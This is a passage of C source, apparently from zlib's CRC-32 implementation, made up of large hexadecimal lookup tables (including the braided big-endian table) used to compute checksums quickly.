0xfe4e1a1a, 0xa650b332, 0x2775d615, 0x166de162, 0x97488445, 0xcf562d6d, 0x4e73484a, 0xad664383, 0x2c4326a4, 0x745d8f8c, 0xf578eaab, 0xc460dddc, 0x4545b8fb, 0x1d5b11d3, 0x9c7e74f4, 0xfed6fe7a, 0x7ff39b5d, 0x27ed3275, 0xa6c85752, 0x97d06025, 0x16f50502, 0x4eebac2a, 0xcfcec90d, 0x2cdbc2c4, 0xadfea7e3, 0xf5e00ecb, 0x74c56bec, 0x45dd5c9b, 0xc4f839bc, 0x9ce69094, 0x1dc3f5b3, 0x81bd8147, 0x0098e460, 0x58864d48, 0xd9a3286f, 
0xe8bb1f18, 0x699e7a3f, 0x3180d317, 0xb0a5b630, 0x53b0bdf9, 0xd295d8de, 0x8a8b71f6, 0x0bae14d1, 0x3ab623a6, 0xbb934681, 0xe38defa9, 0x62a88a8e, 0x26dcfab5, 0xa7f99f92, 0xffe736ba, 0x7ec2539d, 0x4fda64ea, 0xceff01cd, 0x96e1a8e5, 0x17c4cdc2, 0xf4d1c60b, 0x75f4a32c, 0x2dea0a04, 0xaccf6f23, 0x9dd75854, 0x1cf23d73, 0x44ec945b, 0xc5c9f17c, 0x59b78588, 0xd892e0af, 0x808c4987, 0x01a92ca0, 0x30b11bd7, 0xb1947ef0, 0xe98ad7d8, 0x68afb2ff, 0x8bbab936, 0x0a9fdc11, 0x52817539, 0xd3a4101e, 0xe2bc2769, 0x6399424e, 0x3b87eb66, 0xbaa28e41, 0xd80a04cf, 0x592f61e8, 0x0131c8c0, 0x8014ade7, 0xb10c9a90, 0x3029ffb7, 0x6837569f, 0xe91233b8, 0x0a073871, 0x8b225d56, 0xd33cf47e, 0x52199159, 0x6301a62e, 0xe224c309, 0xba3a6a21, 0x3b1f0f06, 0xa7617bf2, 0x26441ed5, 0x7e5ab7fd, 0xff7fd2da, 0xce67e5ad, 0x4f42808a, 0x175c29a2, 0x96794c85, 0x756c474c, 0xf449226b, 0xac578b43, 0x2d72ee64, 0x1c6ad913, 0x9d4fbc34, 0xc551151c, 0x4474703b, 0x4db9f56a, 0xcc9c904d, 0x94823965, 0x15a75c42, 0x24bf6b35, 0xa59a0e12, 0xfd84a73a, 0x7ca1c21d, 0x9fb4c9d4, 0x1e91acf3, 0x468f05db, 0xc7aa60fc, 0xf6b2578b, 0x779732ac, 0x2f899b84, 0xaeacfea3, 0x32d28a57, 0xb3f7ef70, 0xebe94658, 0x6acc237f, 0x5bd41408, 0xdaf1712f, 0x82efd807, 0x03cabd20, 0xe0dfb6e9, 0x61fad3ce, 0x39e47ae6, 0xb8c11fc1, 0x89d928b6, 0x08fc4d91, 0x50e2e4b9, 0xd1c7819e, 0xb36f0b10, 0x324a6e37, 0x6a54c71f, 0xeb71a238, 0xda69954f, 0x5b4cf068, 0x03525940, 0x82773c67, 0x616237ae, 0xe0475289, 0xb859fba1, 0x397c9e86, 0x0864a9f1, 0x8941ccd6, 0xd15f65fe, 0x507a00d9, 0xcc04742d, 0x4d21110a, 0x153fb822, 0x941add05, 0xa502ea72, 0x24278f55, 0x7c39267d, 0xfd1c435a, 0x1e094893, 0x9f2c2db4, 0xc732849c, 0x4617e1bb, 0x770fd6cc, 0xf62ab3eb, 0xae341ac3, 0x2f117fe4, 0x6b650fdf, 0xea406af8, 0xb25ec3d0, 0x337ba6f7, 0x02639180, 0x8346f4a7, 0xdb585d8f, 0x5a7d38a8, 0xb9683361, 0x384d5646, 0x6053ff6e, 0xe1769a49, 0xd06ead3e, 0x514bc819, 0x09556131, 0x88700416, 0x140e70e2, 0x952b15c5, 0xcd35bced, 0x4c10d9ca, 0x7d08eebd, 0xfc2d8b9a, 0xa43322b2, 0x25164795, 0xc6034c5c, 0x4726297b, 
0x1f388053, 0x9e1de574, 0xaf05d203, 0x2e20b724, 0x763e1e0c, 0xf71b7b2b, 0x95b3f1a5, 0x14969482, 0x4c883daa, 0xcdad588d, 0xfcb56ffa, 0x7d900add, 0x258ea3f5, 0xa4abc6d2, 0x47becd1b, 0xc69ba83c, 0x9e850114, 0x1fa06433, 0x2eb85344, 0xaf9d3663, 0xf7839f4b, 0x76a6fa6c, 0xead88e98, 0x6bfdebbf, 0x33e34297, 0xb2c627b0, 0x83de10c7, 0x02fb75e0, 0x5ae5dcc8, 0xdbc0b9ef, 0x38d5b226, 0xb9f0d701, 0xe1ee7e29, 0x60cb1b0e, 0x51d32c79, 0xd0f6495e, 0x88e8e076, 0x09cd8551}, {0x00000000, 0x9b73ead4, 0xed96d3e9, 0x76e5393d, 0x005ca193, 0x9b2f4b47, 0xedca727a, 0x76b998ae, 0x00b94326, 0x9bcaa9f2, 0xed2f90cf, 0x765c7a1b, 0x00e5e2b5, 0x9b960861, 0xed73315c, 0x7600db88, 0x0172864c, 0x9a016c98, 0xece455a5, 0x7797bf71, 0x012e27df, 0x9a5dcd0b, 0xecb8f436, 0x77cb1ee2, 0x01cbc56a, 0x9ab82fbe, 0xec5d1683, 0x772efc57, 0x019764f9, 0x9ae48e2d, 0xec01b710, 0x77725dc4, 0x02e50c98, 0x9996e64c, 0xef73df71, 0x740035a5, 0x02b9ad0b, 0x99ca47df, 0xef2f7ee2, 0x745c9436, 0x025c4fbe, 0x992fa56a, 0xefca9c57, 0x74b97683, 0x0200ee2d, 0x997304f9, 0xef963dc4, 0x74e5d710, 0x03978ad4, 0x98e46000, 0xee01593d, 0x7572b3e9, 0x03cb2b47, 0x98b8c193, 0xee5df8ae, 0x752e127a, 0x032ec9f2, 0x985d2326, 0xeeb81a1b, 0x75cbf0cf, 0x03726861, 0x980182b5, 0xeee4bb88, 0x7597515c, 0x05ca1930, 0x9eb9f3e4, 0xe85ccad9, 0x732f200d, 0x0596b8a3, 0x9ee55277, 0xe8006b4a, 0x7373819e, 0x05735a16, 0x9e00b0c2, 0xe8e589ff, 0x7396632b, 0x052ffb85, 0x9e5c1151, 0xe8b9286c, 0x73cac2b8, 0x04b89f7c, 0x9fcb75a8, 0xe92e4c95, 0x725da641, 0x04e43eef, 0x9f97d43b, 0xe972ed06, 0x720107d2, 0x0401dc5a, 0x9f72368e, 0xe9970fb3, 0x72e4e567, 0x045d7dc9, 0x9f2e971d, 0xe9cbae20, 0x72b844f4, 0x072f15a8, 0x9c5cff7c, 0xeab9c641, 0x71ca2c95, 0x0773b43b, 0x9c005eef, 0xeae567d2, 0x71968d06, 0x0796568e, 0x9ce5bc5a, 0xea008567, 0x71736fb3, 0x07caf71d, 0x9cb91dc9, 0xea5c24f4, 0x712fce20, 0x065d93e4, 0x9d2e7930, 0xebcb400d, 0x70b8aad9, 0x06013277, 0x9d72d8a3, 0xeb97e19e, 0x70e40b4a, 0x06e4d0c2, 0x9d973a16, 0xeb72032b, 0x7001e9ff, 0x06b87151, 0x9dcb9b85, 0xeb2ea2b8, 0x705d486c, 
0x0b943260, 0x90e7d8b4, 0xe602e189, 0x7d710b5d, 0x0bc893f3, 0x90bb7927, 0xe65e401a, 0x7d2daace, 0x0b2d7146, 0x905e9b92, 0xe6bba2af, 0x7dc8487b, 0x0b71d0d5, 0x90023a01, 0xe6e7033c, 0x7d94e9e8, 0x0ae6b42c, 0x91955ef8, 0xe77067c5, 0x7c038d11, 0x0aba15bf, 0x91c9ff6b, 0xe72cc656, 0x7c5f2c82, 0x0a5ff70a, 0x912c1dde, 0xe7c924e3, 0x7cbace37, 0x0a035699, 0x9170bc4d, 0xe7958570, 0x7ce66fa4, 0x09713ef8, 0x9202d42c, 0xe4e7ed11, 0x7f9407c5, 0x092d9f6b, 0x925e75bf, 0xe4bb4c82, 0x7fc8a656, 0x09c87dde, 0x92bb970a, 0xe45eae37, 0x7f2d44e3, 0x0994dc4d, 0x92e73699, 0xe4020fa4, 0x7f71e570, 0x0803b8b4, 0x93705260, 0xe5956b5d, 0x7ee68189, 0x085f1927, 0x932cf3f3, 0xe5c9cace, 0x7eba201a, 0x08bafb92, 0x93c91146, 0xe52c287b, 0x7e5fc2af, 0x08e65a01, 0x9395b0d5, 0xe57089e8, 0x7e03633c, 0x0e5e2b50, 0x952dc184, 0xe3c8f8b9, 0x78bb126d, 0x0e028ac3, 0x95716017, 0xe394592a, 0x78e7b3fe, 0x0ee76876, 0x959482a2, 0xe371bb9f, 0x7802514b, 0x0ebbc9e5, 0x95c82331, 0xe32d1a0c, 0x785ef0d8, 0x0f2cad1c, 0x945f47c8, 0xe2ba7ef5, 0x79c99421, 0x0f700c8f, 0x9403e65b, 0xe2e6df66, 0x799535b2, 0x0f95ee3a, 0x94e604ee, 0xe2033dd3, 0x7970d707, 0x0fc94fa9, 0x94baa57d, 0xe25f9c40, 0x792c7694, 0x0cbb27c8, 0x97c8cd1c, 0xe12df421, 0x7a5e1ef5, 0x0ce7865b, 0x97946c8f, 0xe17155b2, 0x7a02bf66, 0x0c0264ee, 0x97718e3a, 0xe194b707, 0x7ae75dd3, 0x0c5ec57d, 0x972d2fa9, 0xe1c81694, 0x7abbfc40, 0x0dc9a184, 0x96ba4b50, 0xe05f726d, 0x7b2c98b9, 0x0d950017, 0x96e6eac3, 0xe003d3fe, 0x7b70392a, 0x0d70e2a2, 0x96030876, 0xe0e6314b, 0x7b95db9f, 0x0d2c4331, 0x965fa9e5, 0xe0ba90d8, 0x7bc97a0c}, {0x00000000, 0x172864c0, 0x2e50c980, 0x3978ad40, 0x5ca19300, 0x4b89f7c0, 0x72f15a80, 0x65d93e40, 0xb9432600, 0xae6b42c0, 0x9713ef80, 0x803b8b40, 0xe5e2b500, 0xf2cad1c0, 0xcbb27c80, 0xdc9a1840, 0xa9f74a41, 0xbedf2e81, 0x87a783c1, 0x908fe701, 0xf556d941, 0xe27ebd81, 0xdb0610c1, 0xcc2e7401, 0x10b46c41, 0x079c0881, 0x3ee4a5c1, 0x29ccc101, 0x4c15ff41, 0x5b3d9b81, 0x624536c1, 0x756d5201, 0x889f92c3, 0x9fb7f603, 0xa6cf5b43, 0xb1e73f83, 0xd43e01c3, 0xc3166503, 
0xfa6ec843, 0xed46ac83, 0x31dcb4c3, 0x26f4d003, 0x1f8c7d43, 0x08a41983, 0x6d7d27c3, 0x7a554303, 0x432dee43, 0x54058a83, 0x2168d882, 0x3640bc42, 0x0f381102, 0x181075c2, 0x7dc94b82, 0x6ae12f42, 0x53998202, 0x44b1e6c2, 0x982bfe82, 0x8f039a42, 0xb67b3702, 0xa15353c2, 0xc48a6d82, 0xd3a20942, 0xeadaa402, 0xfdf2c0c2, 0xca4e23c7, 0xdd664707, 0xe41eea47, 0xf3368e87, 0x96efb0c7, 0x81c7d407, 0xb8bf7947, 0xaf971d87, 0x730d05c7, 0x64256107, 0x5d5dcc47, 0x4a75a887, 0x2fac96c7, 0x3884f207, 0x01fc5f47, 0x16d43b87, 0x63b96986, 0x74910d46, 0x4de9a006, 0x5ac1c4c6, 0x3f18fa86, 0x28309e46, 0x11483306, 0x066057c6, 0xdafa4f86, 0xcdd22b46, 0xf4aa8606, 0xe382e2c6, 0x865bdc86, 0x9173b846, 0xa80b1506, 0xbf2371c6, 0x42d1b104, 0x55f9d5c4, 0x6c817884, 0x7ba91c44, 0x1e702204, 0x095846c4, 0x3020eb84, 0x27088f44, 0xfb929704, 0xecbaf3c4, 0xd5c25e84, 0xc2ea3a44, 0xa7330404, 0xb01b60c4, 0x8963cd84, 0x9e4ba944, 0xeb26fb45, 0xfc0e9f85, 0xc57632c5, 0xd25e5605, 0xb7876845, 0xa0af0c85, 0x99d7a1c5, 0x8effc505, 0x5265dd45, 0x454db985, 0x7c3514c5, 0x6b1d7005, 0x0ec44e45, 0x19ec2a85, 0x209487c5, 0x37bce305, 0x4fed41cf, 0x58c5250f, 0x61bd884f, 0x7695ec8f, 0x134cd2cf, 0x0464b60f, 0x3d1c1b4f, 0x2a347f8f, 0xf6ae67cf, 0xe186030f, 0xd8feae4f, 0xcfd6ca8f, 0xaa0ff4cf, 0xbd27900f, 0x845f3d4f, 0x9377598f, 0xe61a0b8e, 0xf1326f4e, 0xc84ac20e, 0xdf62a6ce, 0xbabb988e, 0xad93fc4e, 0x94eb510e, 0x83c335ce, 0x5f592d8e, 0x4871494e, 0x7109e40e, 0x662180ce, 0x03f8be8e, 0x14d0da4e, 0x2da8770e, 0x3a8013ce, 0xc772d30c, 0xd05ab7cc, 0xe9221a8c, 0xfe0a7e4c, 0x9bd3400c, 0x8cfb24cc, 0xb583898c, 0xa2abed4c, 0x7e31f50c, 0x691991cc, 0x50613c8c, 0x4749584c, 0x2290660c, 0x35b802cc, 0x0cc0af8c, 0x1be8cb4c, 0x6e85994d, 0x79adfd8d, 0x40d550cd, 0x57fd340d, 0x32240a4d, 0x250c6e8d, 0x1c74c3cd, 0x0b5ca70d, 0xd7c6bf4d, 0xc0eedb8d, 0xf99676cd, 0xeebe120d, 0x8b672c4d, 0x9c4f488d, 0xa537e5cd, 0xb21f810d, 0x85a36208, 0x928b06c8, 0xabf3ab88, 0xbcdbcf48, 0xd902f108, 0xce2a95c8, 0xf7523888, 0xe07a5c48, 0x3ce04408, 0x2bc820c8, 0x12b08d88, 0x0598e948, 
0x6041d708, 0x7769b3c8, 0x4e111e88, 0x59397a48, 0x2c542849, 0x3b7c4c89, 0x0204e1c9, 0x152c8509, 0x70f5bb49, 0x67dddf89, 0x5ea572c9, 0x498d1609, 0x95170e49, 0x823f6a89, 0xbb47c7c9, 0xac6fa309, 0xc9b69d49, 0xde9ef989, 0xe7e654c9, 0xf0ce3009, 0x0d3cf0cb, 0x1a14940b, 0x236c394b, 0x34445d8b, 0x519d63cb, 0x46b5070b, 0x7fcdaa4b, 0x68e5ce8b, 0xb47fd6cb, 0xa357b20b, 0x9a2f1f4b, 0x8d077b8b, 0xe8de45cb, 0xfff6210b, 0xc68e8c4b, 0xd1a6e88b, 0xa4cbba8a, 0xb3e3de4a, 0x8a9b730a, 0x9db317ca, 0xf86a298a, 0xef424d4a, 0xd63ae00a, 0xc11284ca, 0x1d889c8a, 0x0aa0f84a, 0x33d8550a, 0x24f031ca, 0x41290f8a, 0x56016b4a, 0x6f79c60a, 0x7851a2ca}, {0x00000000, 0x9fda839e, 0xe4c4017d, 0x7b1e82e3, 0x12f904bb, 0x8d238725, 0xf63d05c6, 0x69e78658, 0x25f20976, 0xba288ae8, 0xc136080b, 0x5eec8b95, 0x370b0dcd, 0xa8d18e53, 0xd3cf0cb0, 0x4c158f2e, 0x4be412ec, 0xd43e9172, 0xaf201391, 0x30fa900f, 0x591d1657, 0xc6c795c9, 0xbdd9172a, 0x220394b4, 0x6e161b9a, 0xf1cc9804, 0x8ad21ae7, 0x15089979, 0x7cef1f21, 0xe3359cbf, 0x982b1e5c, 0x07f19dc2, 0x97c825d8, 0x0812a646, 0x730c24a5, 0xecd6a73b, 0x85312163, 0x1aeba2fd, 0x61f5201e, 0xfe2fa380, 0xb23a2cae, 0x2de0af30, 0x56fe2dd3, 0xc924ae4d, 0xa0c32815, 0x3f19ab8b, 0x44072968, 0xdbddaaf6, 0xdc2c3734, 0x43f6b4aa, 0x38e83649, 0xa732b5d7, 0xced5338f, 0x510fb011, 0x2a1132f2, 0xb5cbb16c, 0xf9de3e42, 0x6604bddc, 0x1d1a3f3f, 0x82c0bca1, 0xeb273af9, 0x74fdb967, 0x0fe33b84, 0x9039b81a, 0xf4e14df1, 0x6b3bce6f, 0x10254c8c, 0x8fffcf12, 0xe618494a, 0x79c2cad4, 0x02dc4837, 0x9d06cba9, 0xd1134487, 0x4ec9c719, 0x35d745fa, 0xaa0dc664, 0xc3ea403c, 0x5c30c3a2, 0x272e4141, 0xb8f4c2df, 0xbf055f1d, 0x20dfdc83, 0x5bc15e60, 0xc41bddfe, 0xadfc5ba6, 0x3226d838, 0x49385adb, 0xd6e2d945, 0x9af7566b, 0x052dd5f5, 0x7e335716, 0xe1e9d488, 0x880e52d0, 0x17d4d14e, 0x6cca53ad, 0xf310d033, 0x63296829, 0xfcf3ebb7, 0x87ed6954, 0x1837eaca, 0x71d06c92, 0xee0aef0c, 0x95146def, 0x0aceee71, 0x46db615f, 0xd901e2c1, 0xa21f6022, 0x3dc5e3bc, 0x542265e4, 0xcbf8e67a, 0xb0e66499, 0x2f3ce707, 0x28cd7ac5, 0xb717f95b, 
0xcc097bb8, 0x53d3f826, 0x3a347e7e, 0xa5eefde0, 0xdef07f03, 0x412afc9d, 0x0d3f73b3, 0x92e5f02d, 0xe9fb72ce, 0x7621f150, 0x1fc67708, 0x801cf496, 0xfb027675, 0x64d8f5eb, 0x32b39da3, 0xad691e3d, 0xd6779cde, 0x49ad1f40, 0x204a9918, 0xbf901a86, 0xc48e9865, 0x5b541bfb, 0x174194d5, 0x889b174b, 0xf38595a8, 0x6c5f1636, 0x05b8906e, 0x9a6213f0, 0xe17c9113, 0x7ea6128d, 0x79578f4f, 0xe68d0cd1, 0x9d938e32, 0x02490dac, 0x6bae8bf4, 0xf474086a, 0x8f6a8a89, 0x10b00917, 0x5ca58639, 0xc37f05a7, 0xb8618744, 0x27bb04da, 0x4e5c8282, 0xd186011c, 0xaa9883ff, 0x35420061, 0xa57bb87b, 0x3aa13be5, 0x41bfb906, 0xde653a98, 0xb782bcc0, 0x28583f5e, 0x5346bdbd, 0xcc9c3e23, 0x8089b10d, 0x1f533293, 0x644db070, 0xfb9733ee, 0x9270b5b6, 0x0daa3628, 0x76b4b4cb, 0xe96e3755, 0xee9faa97, 0x71452909, 0x0a5babea, 0x95812874, 0xfc66ae2c, 0x63bc2db2, 0x18a2af51, 0x87782ccf, 0xcb6da3e1, 0x54b7207f, 0x2fa9a29c, 0xb0732102, 0xd994a75a, 0x464e24c4, 0x3d50a627, 0xa28a25b9, 0xc652d052, 0x598853cc, 0x2296d12f, 0xbd4c52b1, 0xd4abd4e9, 0x4b715777, 0x306fd594, 0xafb5560a, 0xe3a0d924, 0x7c7a5aba, 0x0764d859, 0x98be5bc7, 0xf159dd9f, 0x6e835e01, 0x159ddce2, 0x8a475f7c, 0x8db6c2be, 0x126c4120, 0x6972c3c3, 0xf6a8405d, 0x9f4fc605, 0x0095459b, 0x7b8bc778, 0xe45144e6, 0xa844cbc8, 0x379e4856, 0x4c80cab5, 0xd35a492b, 0xbabdcf73, 0x25674ced, 0x5e79ce0e, 0xc1a34d90, 0x519af58a, 0xce407614, 0xb55ef4f7, 0x2a847769, 0x4363f131, 0xdcb972af, 0xa7a7f04c, 0x387d73d2, 0x7468fcfc, 0xebb27f62, 0x90acfd81, 0x0f767e1f, 0x6691f847, 0xf94b7bd9, 0x8255f93a, 0x1d8f7aa4, 0x1a7ee766, 0x85a464f8, 0xfebae61b, 0x61606585, 0x0887e3dd, 0x975d6043, 0xec43e2a0, 0x7399613e, 0x3f8cee10, 0xa0566d8e, 0xdb48ef6d, 0x44926cf3, 0x2d75eaab, 0xb2af6935, 0xc9b1ebd6, 0x566b6848}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x00000000, 0x9e83da9f, 0x7d01c4e4, 0xe3821e7b, 0xbb04f912, 0x2587238d, 0xc6053df6, 0x5886e769, 0x7609f225, 0xe88a28ba, 0x0b0836c1, 0x958bec5e, 0xcd0d0b37, 0x538ed1a8, 0xb00ccfd3, 0x2e8f154c, 0xec12e44b, 0x72913ed4, 0x911320af, 
0x0f90fa30, 0x57161d59, 0xc995c7c6, 0x2a17d9bd, 0xb4940322, 0x9a1b166e, 0x0498ccf1, 0xe71ad28a, 0x79990815, 0x211fef7c, 0xbf9c35e3, 0x5c1e2b98, 0xc29df107, 0xd825c897, 0x46a61208, 0xa5240c73, 0x3ba7d6ec, 0x63213185, 0xfda2eb1a, 0x1e20f561, 0x80a32ffe, 0xae2c3ab2, 0x30afe02d, 0xd32dfe56, 0x4dae24c9, 0x1528c3a0, 0x8bab193f, 0x68290744, 0xf6aadddb, 0x34372cdc, 0xaab4f643, 0x4936e838, 0xd7b532a7, 0x8f33d5ce, 0x11b00f51, 0xf232112a, 0x6cb1cbb5, 0x423edef9, 0xdcbd0466, 0x3f3f1a1d, 0xa1bcc082, 0xf93a27eb, 0x67b9fd74, 0x843be30f, 0x1ab83990, 0xf14de1f4, 0x6fce3b6b, 0x8c4c2510, 0x12cfff8f, 0x4a4918e6, 0xd4cac279, 0x3748dc02, 0xa9cb069d, 0x874413d1, 0x19c7c94e, 0xfa45d735, 0x64c60daa, 0x3c40eac3, 0xa2c3305c, 0x41412e27, 0xdfc2f4b8, 0x1d5f05bf, 0x83dcdf20, 0x605ec15b, 0xfedd1bc4, 0xa65bfcad, 0x38d82632, 0xdb5a3849, 0x45d9e2d6, 0x6b56f79a, 0xf5d52d05, 0x1657337e, 0x88d4e9e1, 0xd0520e88, 0x4ed1d417, 0xad53ca6c, 0x33d010f3, 0x29682963, 0xb7ebf3fc, 0x5469ed87, 0xcaea3718, 0x926cd071, 0x0cef0aee, 0xef6d1495, 0x71eece0a, 0x5f61db46, 0xc1e201d9, 0x22601fa2, 0xbce3c53d, 0xe4652254, 0x7ae6f8cb, 0x9964e6b0, 0x07e73c2f, 0xc57acd28, 0x5bf917b7, 0xb87b09cc, 0x26f8d353, 0x7e7e343a, 0xe0fdeea5, 0x037ff0de, 0x9dfc2a41, 0xb3733f0d, 0x2df0e592, 0xce72fbe9, 0x50f12176, 0x0877c61f, 0x96f41c80, 0x757602fb, 0xebf5d864, 0xa39db332, 0x3d1e69ad, 0xde9c77d6, 0x401fad49, 0x18994a20, 0x861a90bf, 0x65988ec4, 0xfb1b545b, 0xd5944117, 0x4b179b88, 0xa89585f3, 0x36165f6c, 0x6e90b805, 0xf013629a, 0x13917ce1, 0x8d12a67e, 0x4f8f5779, 0xd10c8de6, 0x328e939d, 0xac0d4902, 0xf48bae6b, 0x6a0874f4, 0x898a6a8f, 0x1709b010, 0x3986a55c, 0xa7057fc3, 0x448761b8, 0xda04bb27, 0x82825c4e, 0x1c0186d1, 0xff8398aa, 0x61004235, 0x7bb87ba5, 0xe53ba13a, 0x06b9bf41, 0x983a65de, 0xc0bc82b7, 0x5e3f5828, 0xbdbd4653, 0x233e9ccc, 0x0db18980, 0x9332531f, 0x70b04d64, 0xee3397fb, 0xb6b57092, 0x2836aa0d, 0xcbb4b476, 0x55376ee9, 0x97aa9fee, 0x09294571, 0xeaab5b0a, 0x74288195, 0x2cae66fc, 0xb22dbc63, 0x51afa218, 0xcf2c7887, 0xe1a36dcb, 
0x7f20b754, 0x9ca2a92f, 0x022173b0, 0x5aa794d9, 0xc4244e46, 0x27a6503d, 0xb9258aa2, 0x52d052c6, 0xcc538859, 0x2fd19622, 0xb1524cbd, 0xe9d4abd4, 0x7757714b, 0x94d56f30, 0x0a56b5af, 0x24d9a0e3, 0xba5a7a7c, 0x59d86407, 0xc75bbe98, 0x9fdd59f1, 0x015e836e, 0xe2dc9d15, 0x7c5f478a, 0xbec2b68d, 0x20416c12, 0xc3c37269, 0x5d40a8f6, 0x05c64f9f, 0x9b459500, 0x78c78b7b, 0xe64451e4, 0xc8cb44a8, 0x56489e37, 0xb5ca804c, 0x2b495ad3, 0x73cfbdba, 0xed4c6725, 0x0ece795e, 0x904da3c1, 0x8af59a51, 0x147640ce, 0xf7f45eb5, 0x6977842a, 0x31f16343, 0xaf72b9dc, 0x4cf0a7a7, 0xd2737d38, 0xfcfc6874, 0x627fb2eb, 0x81fdac90, 0x1f7e760f, 0x47f89166, 0xd97b4bf9, 0x3af95582, 0xa47a8f1d, 0x66e77e1a, 0xf864a485, 0x1be6bafe, 0x85656061, 0xdde38708, 0x43605d97, 0xa0e243ec, 0x3e619973, 0x10ee8c3f, 0x8e6d56a0, 0x6def48db, 0xf36c9244, 0xabea752d, 0x3569afb2, 0xd6ebb1c9, 0x48686b56}, {0x00000000, 0xc0642817, 0x80c9502e, 0x40ad7839, 0x0093a15c, 0xc0f7894b, 0x805af172, 0x403ed965, 0x002643b9, 0xc0426bae, 0x80ef1397, 0x408b3b80, 0x00b5e2e5, 0xc0d1caf2, 0x807cb2cb, 0x40189adc, 0x414af7a9, 0x812edfbe, 0xc183a787, 0x01e78f90, 0x41d956f5, 0x81bd7ee2, 0xc11006db, 0x01742ecc, 0x416cb410, 0x81089c07, 0xc1a5e43e, 0x01c1cc29, 0x41ff154c, 0x819b3d5b, 0xc1364562, 0x01526d75, 0xc3929f88, 0x03f6b79f, 0x435bcfa6, 0x833fe7b1, 0xc3013ed4, 0x036516c3, 0x43c86efa, 0x83ac46ed, 0xc3b4dc31, 0x03d0f426, 0x437d8c1f, 0x8319a408, 0xc3277d6d, 0x0343557a, 0x43ee2d43, 0x838a0554, 0x82d86821, 0x42bc4036, 0x0211380f, 0xc2751018, 0x824bc97d, 0x422fe16a, 0x02829953, 0xc2e6b144, 0x82fe2b98, 0x429a038f, 0x02377bb6, 0xc25353a1, 0x826d8ac4, 0x4209a2d3, 0x02a4daea, 0xc2c0f2fd, 0xc7234eca, 0x074766dd, 0x47ea1ee4, 0x878e36f3, 0xc7b0ef96, 0x07d4c781, 0x4779bfb8, 0x871d97af, 0xc7050d73, 0x07612564, 0x47cc5d5d, 0x87a8754a, 0xc796ac2f, 0x07f28438, 0x475ffc01, 0x873bd416, 0x8669b963, 0x460d9174, 0x06a0e94d, 0xc6c4c15a, 0x86fa183f, 0x469e3028, 0x06334811, 0xc6576006, 0x864ffada, 0x462bd2cd, 0x0686aaf4, 0xc6e282e3, 0x86dc5b86, 0x46b87391, 0x06150ba8, 
0xc67123bf, 0x04b1d142, 0xc4d5f955, 0x8478816c, 0x441ca97b, 0x0422701e, 0xc4465809, 0x84eb2030, 0x448f0827, 0x049792fb, 0xc4f3baec, 0x845ec2d5, 0x443aeac2, 0x040433a7, 0xc4601bb0, 0x84cd6389, 0x44a94b9e, 0x45fb26eb, 0x859f0efc, 0xc53276c5, 0x05565ed2, 0x456887b7, 0x850cafa0, 0xc5a1d799, 0x05c5ff8e, 0x45dd6552, 0x85b94d45, 0xc514357c, 0x05701d6b, 0x454ec40e, 0x852aec19, 0xc5879420, 0x05e3bc37, 0xcf41ed4f, 0x0f25c558, 0x4f88bd61, 0x8fec9576, 0xcfd24c13, 0x0fb66404, 0x4f1b1c3d, 0x8f7f342a, 0xcf67aef6, 0x0f0386e1, 0x4faefed8, 0x8fcad6cf, 0xcff40faa, 0x0f9027bd, 0x4f3d5f84, 0x8f597793, 0x8e0b1ae6, 0x4e6f32f1, 0x0ec24ac8, 0xcea662df, 0x8e98bbba, 0x4efc93ad, 0x0e51eb94, 0xce35c383, 0x8e2d595f, 0x4e497148, 0x0ee40971, 0xce802166, 0x8ebef803, 0x4edad014, 0x0e77a82d, 0xce13803a, 0x0cd372c7, 0xccb75ad0, 0x8c1a22e9, 0x4c7e0afe, 0x0c40d39b, 0xcc24fb8c, 0x8c8983b5, 0x4cedaba2, 0x0cf5317e, 0xcc911969, 0x8c3c6150, 0x4c584947, 0x0c669022, 0xcc02b835, 0x8cafc00c, 0x4ccbe81b, 0x4d99856e, 0x8dfdad79, 0xcd50d540, 0x0d34fd57, 0x4d0a2432, 0x8d6e0c25, 0xcdc3741c, 0x0da75c0b, 0x4dbfc6d7, 0x8ddbeec0, 0xcd7696f9, 0x0d12beee, 0x4d2c678b, 0x8d484f9c, 0xcde537a5, 0x0d811fb2, 0x0862a385, 0xc8068b92, 0x88abf3ab, 0x48cfdbbc, 0x08f102d9, 0xc8952ace, 0x883852f7, 0x485c7ae0, 0x0844e03c, 0xc820c82b, 0x888db012, 0x48e99805, 0x08d74160, 0xc8b36977, 0x881e114e, 0x487a3959, 0x4928542c, 0x894c7c3b, 0xc9e10402, 0x09852c15, 0x49bbf570, 0x89dfdd67, 0xc972a55e, 0x09168d49, 0x490e1795, 0x896a3f82, 0xc9c747bb, 0x09a36fac, 0x499db6c9, 0x89f99ede, 0xc954e6e7, 0x0930cef0, 0xcbf03c0d, 0x0b94141a, 0x4b396c23, 0x8b5d4434, 0xcb639d51, 0x0b07b546, 0x4baacd7f, 0x8bcee568, 0xcbd67fb4, 0x0bb257a3, 0x4b1f2f9a, 0x8b7b078d, 0xcb45dee8, 0x0b21f6ff, 0x4b8c8ec6, 0x8be8a6d1, 0x8abacba4, 0x4adee3b3, 0x0a739b8a, 0xca17b39d, 0x8a296af8, 0x4a4d42ef, 0x0ae03ad6, 0xca8412c1, 0x8a9c881d, 0x4af8a00a, 0x0a55d833, 0xca31f024, 0x8a0f2941, 0x4a6b0156, 0x0ac6796f, 0xcaa25178}, {0x00000000, 0xd4ea739b, 0xe9d396ed, 0x3d39e576, 0x93a15c00, 
0x474b2f9b, 0x7a72caed, 0xae98b976, 0x2643b900, 0xf2a9ca9b, 0xcf902fed, 0x1b7a5c76, 0xb5e2e500, 0x6108969b, 0x5c3173ed, 0x88db0076, 0x4c867201, 0x986c019a, 0xa555e4ec, 0x71bf9777, 0xdf272e01, 0x0bcd5d9a, 0x36f4b8ec, 0xe21ecb77, 0x6ac5cb01, 0xbe2fb89a, 0x83165dec, 0x57fc2e77, 0xf9649701, 0x2d8ee49a, 0x10b701ec, 0xc45d7277, 0x980ce502, 0x4ce69699, 0x71df73ef, 0xa5350074, 0x0badb902, 0xdf47ca99, 0xe27e2fef, 0x36945c74, 0xbe4f5c02, 0x6aa52f99, 0x579ccaef, 0x8376b974, 0x2dee0002, 0xf9047399, 0xc43d96ef, 0x10d7e574, 0xd48a9703, 0x0060e498, 0x3d5901ee, 0xe9b37275, 0x472bcb03, 0x93c1b898, 0xaef85dee, 0x7a122e75, 0xf2c92e03, 0x26235d98, 0x1b1ab8ee, 0xcff0cb75, 0x61687203, 0xb5820198, 0x88bbe4ee, 0x5c519775, 0x3019ca05, 0xe4f3b99e, 0xd9ca5ce8, 0x0d202f73, 0xa3b89605, 0x7752e59e, 0x4a6b00e8, 